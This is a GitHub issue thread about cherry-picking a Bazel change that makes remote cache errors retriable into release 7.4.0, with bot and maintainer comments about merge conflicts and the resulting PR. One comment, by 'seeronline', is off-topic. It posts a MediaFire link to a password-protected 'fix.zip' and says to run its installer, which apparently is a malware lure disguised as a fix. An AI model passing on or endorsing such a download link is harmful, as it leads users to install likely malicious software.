### ISSUE TITLE
[7.4.0] Mark remote cache errors as retriable by expanding `--incompatible_remote_use_new_exit_code_for_lost_inputs`

### ISSUE THREAD

**Issue by bazel-io** [bazelbuild/bazel#23420]
Forked from #23079

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bazel-io** [comment]
Cherry-pick was attempted but there were merge conflicts in the following file(s). Please resolve manually.

`src/main/java/com/google/devtools/build/lib/runtime/BlazeCommandDispatcher.java`

cc: @bazelbuild/triage

**Comment by iancha1992** [comment]
Cherry-picked in https://github.com/bazelbuild/bazel/pull/23426
